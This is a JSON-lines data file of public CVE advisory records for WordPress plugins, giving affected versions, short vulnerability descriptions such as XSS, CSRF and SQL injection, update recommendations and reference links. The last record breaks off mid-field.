{"CVE_ID":"CVE-2024-8735","slug":"mailmunch","versionImpact":"3.1.8","versionEndExcluding":"3.2.0","description":"The MailMunch \u2013 Grow your Email List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailmunch\\\/tags\\\/3.1.8\\\/admin\\\/partials\\\/mailmunch-admin-display.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailmunch\\\/tags\\\/3.1.8\\\/admin\\\/partials\\\/mailmunch-admin-display.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193789%40mailmunch&new=3193789%40mailmunch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193789%40mailmunch&new=3193789%40mailmunch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e45860-16c4-4d13-aad9-c742a8eced37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e45860-16c4-4d13-aad9-c742a8eced37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5238","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to an HTML Injection on the plugin in the search area of the website.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47a5fbfd-f47c-4356-8567-b29dadb48423\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47a5fbfd-f47c-4356-8567-b29dadb48423\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3295","slug":"user-registration","versionImpact":"3.1.5","versionEndExcluding":"3.2.0","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the profile_pic_remove function in versions up to, and including, 3.1.5. This makes it possible for unauthenticated attackers to delete any media file.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/864a3444-0479-4b9f-beca-584a4a9b8682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/864a3444-0479-4b9f-beca-584a4a9b8682?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.1.5\\\/includes\\\/class-ur-ajax.php#L1111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.1.5\\\/includes\\\/class-ur-ajax.php#L1111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php?rev=3070439#L1115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php?rev=3070439#L1115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4251","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not have CSRF checks when creating bookings, which could allow attackers to make logged in users create unwanted bookings via CSRF attacks.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce564628-3d15-4bc5-8b8e-60b71786ac19\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce564628-3d15-4bc5-8b8e-60b71786ac19\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4250","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c271619-f478-45c3-91d9-be0f55ee06a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c271619-f478-45c3-91d9-be0f55ee06a2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2417","slug":"user-registration","versionImpact":"3.1.5","versionEndExcluding":"3.2.0","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the form_save_action() function in all versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the registration form and make the default registration role administrator. This subsequently allows the attacker to register an account as an administrator on the site.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03459d8-b1f2-4270-a294-403754db1f2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03459d8-b1f2-4270-a294-403754db1f2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/user-registration\\\/commit\\\/d265273aa4dddb24ade929be78c6bf1766f1cf00\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/user-registration\\\/commit\\\/d265273aa4dddb24ade929be78c6bf1766f1cf00\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0688","slug":"pubsubhubbub","versionImpact":"3.1.4","versionEndExcluding":"3.2.0","description":"The \"WebSub (FKA. PubSubHubbub)\" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23843","slug":"wp-hr-manager","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphrmanager WP-HR Manager: The Human Resources Plugin for WordPress allows Reflected XSS. This issue affects WP-HR Manager: The Human Resources Plugin for WordPress: from n\/a through 3.1.0.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-hr-manager\\\/vulnerability\\\/wordpress-wp-hr-manager-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-hr-manager\\\/vulnerability\\\/wordpress-wp-hr-manager-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7204","slug":"wp-staging","versionEndExcluding":"3.2.0","description":"The WP STAGING WordPress Backup plugin before 3.2.0 allows access to cache files during the cloning process which provides","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a8cf83-d6cc-4d4c-a482-288a83a69879\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a8cf83-d6cc-4d4c-a482-288a83a69879\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4224","slug":"wpforo-advanced-attachments","versionImpact":"3.1.3","versionEndExcluding":"3.2.0","description":"The wpForo + wpForo Advanced Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via media upload names in all versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gvectors.com\\\/product\\\/wpforo-advanced-attachments\\\/#tab-changelog\",\"name\":\"https:\\\/\\\/gvectors.com\\\/product\\\/wpforo-advanced-attachments\\\/#tab-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e634dafc-8eb0-406f-93b1-ee1d2b44171d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e634dafc-8eb0-406f-93b1-ee1d2b44171d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4268","slug":"ultimate-blocks","versionImpact":"3.1.9","versionEndExcluding":"3.2.0","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b60b53-77bf-4640-bf2b-84e011014623?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b60b53-77bf-4640-bf2b-84e011014623?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/advanced-heading\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/advanced-heading\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/styled-box\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/styled-box\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/how-to\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/how-to\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/image-slider\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/image-slider\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/testimonial\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/testimonial\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/webber-naut\\\/0a8a4f810da286392a43c4614d31712e\",\"name\":\"https:\\\/\\\/gist.github.com\\\/webber-naut\\\/0a8a4f810da286392a43c4614d31712e\",\"refsource\":\"\",\"tags\":[\"Broken Link\"]},{\"url\":\"https:\\\/\\\/www.dropbox.com\\\/scl\\\/fi\\\/zh7t1qsvxkxk2dfhwd7nn\\\/Ultimate-Blocks-Stored-XSS_POC_4.20.24.mov?rlkey=ws16dcu7f6mjd3h9emsqev7jm&e=2&st=fdr7q9h7&dl=0\",\"name\":\"https:\\\/\\\/www.dropbox.com\\\/scl\\\/fi\\\/zh7t1qsvxkxk2dfhwd7nn\\\/Ultimate-Blocks-Stored-XSS_POC_4.20.24.mov?rlkey=ws16dcu7f6mjd3h9emsqev7jm&e=2&st=fdr7q9h7&dl=0\",\"refsource\":\"\",\"tags\":[\"Broken Link\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075315\\\/ultimate-blocks\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075315\\\/ultimate-blocks\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/custom-css\\\/class-custom-css.php?rev=3102541#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/custom-css\\\/class-custom-css.php?rev=3102541#L173\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108401\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108401\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]}]"}
{"CVE_ID":"CVE-2024-3513","slug":"ultimate-blocks","versionImpact":"3.1.9","versionEndExcluding":"3.2.0","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the title tag parameter in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/428b4d6b-a4db-4e60-8c15-24efdfe6aea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/428b4d6b-a4db-4e60-8c15-24efdfe6aea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3108401%40ultimate-blocks%2Ftrunk&old=3102541%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3108401%40ultimate-blocks%2Ftrunk&old=3102541%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6568","slug":"flamix-bitrix24-and-contact-forms-7-integrations","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"The Flamix: Bitrix24 and Contact Form 7 integrations plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.1.0. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2050ea-70b3-476d-841f-021c3baddf35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2050ea-70b3-476d-841f-021c3baddf35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flamix-bitrix24-and-contact-forms-7-integrations\\\/trunk\\\/includes\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flamix-bitrix24-and-contact-forms-7-integrations\\\/trunk\\\/includes\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&new=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&new=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7151","slug":"gm-woocommerce-quote-popup","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.2 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4992a4a9-f21a-46e2-babf-954acfc7c5b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4992a4a9-f21a-46e2-babf-954acfc7c5b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4749","slug":"post-list-designer","versionEndExcluding":"3.2","description":"The Posts List Designer by Category WordPress plugin before 3.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8afc3b2a-81e5-4b6f-8f4c-c48492843569\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8afc3b2a-81e5-4b6f-8f4c-c48492843569\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5432","slug":"jquery-news-ticker","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jquery-news-ticker' shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d22d9414-2df9-4528-a426-dce6e83f8d44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d22d9414-2df9-4528-a426-dce6e83f8d44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010828\\\/jquery-news-ticker\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010828\\\/jquery-news-ticker\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32739","slug":"wp-custom-cursors","versionEndExcluding":"3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Web_Trendy WP Custom Cursors | WordPress Cursor Plugin plugin <\u00a03.2 versions.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-custom-cursors\\\/wordpress-wp-custom-cursors-plugin-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-custom-cursors\\\/wordpress-wp-custom-cursors-plugin-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2221","slug":"wp-custom-cursors","versionEndExcluding":"3.2","description":"The WP Custom Cursors WordPress plugin before 3.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6666688e-7239-4d40-a348-307cf8f3b657\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6666688e-7239-4d40-a348-307cf8f3b657\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7385","slug":"wp-simple-html-sitemap","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The WordPress Simple HTML Sitemap plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f529b981-623f-4bd3-9155-ebfab4c65d1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f529b981-623f-4bd3-9155-ebfab4c65d1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-html-sitemap\\\/tags\\\/3.1\\\/inc\\\/wshs_saved.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-html-sitemap\\\/tags\\\/3.1\\\/inc\\\/wshs_saved.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155037\\\/wp-simple-html-sitemap\\\/trunk\\\/inc\\\/wshs_saved.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155037\\\/wp-simple-html-sitemap\\\/trunk\\\/inc\\\/wshs_saved.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6884","slug":"widget-google-reviews","versionImpact":"3.1","versionEndExcluding":"3.2","description":"This plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on the 'place_id' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/widget-google-reviews\\\/tags\\\/3.1\\\/includes\\\/class-feed-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/widget-google-reviews\\\/tags\\\/3.1\\\/includes\\\/class-feed-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6884\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6884\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3729","slug":"acf-frontend-form-element","versionImpact":"3.19.4","versionEndExcluding":"3.19.5","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to improper missing encryption exception handling  on the 'fea_encrypt' function in all versions up to, and including, 3.19.4. This makes it possible for unauthenticated attackers to manipulate the user processing forms, which can be used to add and edit administrator user for privilege escalation, or to automatically log in users for authentication bypass, or manipulate the post processing form that can be used to inject arbitrary web scripts. This can only be exploited if the 'openssl' php extension is not loaded on the server.","recommendation":"Update to version 3.19.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d22c5d-5ef5-4920-a1b5-e8284394c7e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d22c5d-5ef5-4920-a1b5-e8284394c7e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/tags\\\/3.18.15\\\/main\\\/helpers.php#L617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/tags\\\/3.18.15\\\/main\\\/helpers.php#L617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073379\\\/acf-frontend-form-element#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073379\\\/acf-frontend-form-element#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12877","slug":"give","versionImpact":"3.19.2","versionEndExcluding":"3.19.3","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.2 via deserialization of untrusted input from the donation form like 'firstName'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server that makes remote code execution possible. Please note this was only partially patched in 3.19.3, a fully sufficient patch was not released until 3.19.4. However, another CVE was assigned by another CNA for version 3.19.3 so we will leave this as affecting 3.19.2 and before. We have recommended the vendor use JSON encoding to prevent any further deserialization vulnerabilities from being present.","recommendation":"Update to version 3.19.3, or a newer patched 